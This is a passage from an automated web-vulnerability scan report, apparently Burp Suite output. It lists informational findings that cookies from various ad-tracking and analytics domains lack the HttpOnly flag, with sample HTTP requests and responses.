CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-2; expires=Wed, 12 Sep 2012 05:19:27 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-2; expires=Wed, 12-Sep-2012 05:19:27 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.58. http://ap.lijit.com/www/delivery/retarget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ap.lijit.com
Path:	/www/delivery/retarget.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljt_retarget=2592000%2Cdeleted; expires=Mon, 22-Aug-2011 04:52:06 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.59. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1mhipNwAuhnalExkNK7HUtFp4B4dlWpgdjcNJS3THUemj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

11.60. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2QdMDSbkhgllExkNK7HUtFp4B4dlWpgdh9dravNQislaD8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.61. http://apr.lijit.com///www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apr.lijit.com
Path:	///www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; expires=Sun, 22-Jul-2012 04:49:10 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.62. http://ar.atwola.com/atd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.atwola.com
Path:	/atd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cords=MToxMzExNDI4Nzk5OjUsMTMxMTQyODc5OTo3LDEzMTExMjU1OTg=; domain=.ar.atwola.com; path=/; expires=Sun, 20 Nov 2011 13:46:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cords=MToxMzExMTI1NTk4OjUsMTMxMDM5MzYzMzo3LDEzMTExMjU1OTg=

Response

HTTP/1.1 302 Found
Date: Sat, 23 Jul 2011 13:46:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2
Expires: Sat, 23 Jul 2011 13:46:39 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURo DEVo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV INT STA DEM OUR"
Set-Cookie: cords=MToxMzExNDI4Nzk5OjUsMTMxMTQyODc5OTo3LDEzMTExMjU1OTg=; domain=.ar.atwola.com; path=/; expires=Sun, 20 Nov 2011 13:46:39 GMT
Location: http://adadvisor.net/adscores/g.pixel?sid=9201047028&rand=668835
Content-Length: 0
Content-Type: text/plain

11.63. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:30 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:30 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.64. http://articleonepartners.app7.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://articleonepartners.app7.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT192=638653612.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: articleonepartners.app7.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.articleonepartners.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 22 Jul 2011 20:54:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=2wQ0AINnzQEkAAAAZDNmMjkwZDAtODU1My00YTM1LTgyOTAtODBjMWQ0N2JlYTkw0; expires=Sat, 21-Jul-2012 20:54:20 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=ccc8f979-716a-46c2-b5c5-dd104d2fb89b; domain=articleonepartners.app7.hubspot.com; expires=Thu, 22-Jul-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT192=638653612.0.0000; path=/
Content-Length: 497

var hsUse20Servers = true;
var hsDayEndsIn = 25539;
var hsWeekEndsIn = 198339;
var hsMonthEndsIn = 803139;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-07-22 16:54:
...[SNIP]...

11.65. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UA=AAAAAQAUeCrEhfYoCdG1PWFq58L0DU1XwxADA3gBdZHNS1RRFMB_5.ILJygXtgrBpppRBjQTGaVPJSjdCOL4F4yQQkxIK4m.NjJlBEERtLGkp2blF4owVtPCRbRwIQSBNURgMAYJKqmTSafXm3mr9zb3nvt7v3PuuQcoxTzawjo_glS_gLV1IABS82pqMoqZvYDVEkfqY5CLeszucb1R9UbVW8uz2yUtEdfrVK9DvXqPNSUwAwmstkmkNg2_EnmWzG70Yuy7yjaRuiHY_OGx1XuYl5ew4mGk4Srs7Cmwr33FmPEnWJ0TyIlm.DPisVtlmMdx7eEacuwOrGvN__0ll35WYaYXlPUjJ8dhd8Nj2aD291vfxdb.prW_nQJb7Hug_bWqF9N6r9XT93JzLl7_iLnfgXX6ABJZhtVMgaU_dGPefsE6M4CcnUeMvqnrpecz_l4q6._N5Pzml0xtB_zml0x9X8F0faNoOYeEdX6Zy_m7lH0KDeve.LpzkX2.NedCVerSWvnmJvvBvmKKJSBw8aHZK.d0M7ggFbqU97px0YSc0piaQLkckqAcliNyVEISdn5r_CwoffrOiYLvpVaj5zHn8OAzTRHVeKzZSTFsO8vQDWnQQzne3p_Qef_7_gLBl6Y2; Domain=.amgdgt.com; Expires=Sun, 21-Aug-2011 20:31:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.66. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=5fdd2b8-168.143.242.106-1311187256; expires=Sat, 20-Jul-2013 17:59:24 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.67. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=5fdd2b8-168.143.242.106-1311187256; expires=Sat, 20-Jul-2013 18:01:12 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.68. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Mon, 22-Jul-2013 01:52:35 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.69. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=39460fd-77.67.87.8-1311271269; expires=Sat, 20-Jul-2013 18:42:40 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.70. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

aud=ABR4nGNgYGDw07pwjIGB0TDcvq2cwYqBQUCpgaEBKN4LpnguQ6ibYIq%2FEkwxr4HwqsCUaCKESoAI%2FgVTHEZgSuwxmOKaAabEC8CUyDmISjcwxRcGUfkJTPF%2Bg%2FAgFokegvCKII54D1HyB0yxSoEpwa8QlTshcswQ3i4ItQeivRPC2w%2FhdUNUSkMEF0KM5oO4E%2BJcMXEGEBC6BgkJiLVsvGBK4j6ECgRTkk4QyhHiFVGIN%2FeBKYHjYEroGYQqhhi9BcIrgahUhbjFFOKVAxDBVRC3%2BEMs8gJSAMzIYGs%3D; Domain=.crwdcntrl.net; Expires=Wed, 18-Apr-2012 13:46:46 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FrQvH%2Fq95EMvAwGgYbt9WDhJj4BP43sbEwCD5WvA%2FiOsJpBkZGIEMxj8M6v67ihgZmDgYGIBiIEFG%2F10lqAIC33ajCiRUWDLDjYNJIBkLtAtosozAt6s4bRX4oY5TLqEihDjjT%2BEyQiahogrdyTXoAlnoAql4jEtBVczgI%2Fh9NtCRSvPP%2F2cECpwF0iAJydcC%2F8EqlMLOZLMAxVdMBhsn2cAAkme0ANIg9V8g%2FEAVJ2a4IkZLVEmtPaa4JdOqAkDGQzhQazGMDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRVPAIakEpIGScJPA6QFNEyMsLTBC0wkjMOEoAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwBC9DUP; Domain=.crwdcntrl.net; Expires=Wed, 18-Apr-2012 13:46:46 GMT; Path=/
OAID=aa8272d1805895ab786afc266fb574e9; Domain=.crwdcntrl.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.71. http://bh.contextweb.com/bh/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/getuid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

V=3Xw5Pjg54vjm; Domain=.contextweb.com; Expires=Sun, 15-Jul-2012 18:42:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.72. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonglobe.tt.omtrdc.net
Path:	/m2/bostonglobe/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mboxPC=1311428781592-195064.17; Domain=bostonglobe.tt.omtrdc.net; Expires=Sat, 06-Aug-2011 13:48:14 GMT; Path=/m2/bostonglobe

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.73. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A3=lHQFb8QE0aSM00001lHQEb8QF0aSM00001; expires=Wed, 19-Oct-2011 14:01:47 GMT; domain=.serving-sys.com; path=/
B3=al.q0000000002vH; expires=Wed, 19-Oct-2011 14:01:47 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

11.74. http://c.atdmt.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.atdmt.com
Path:	/c.gif

Issue detail

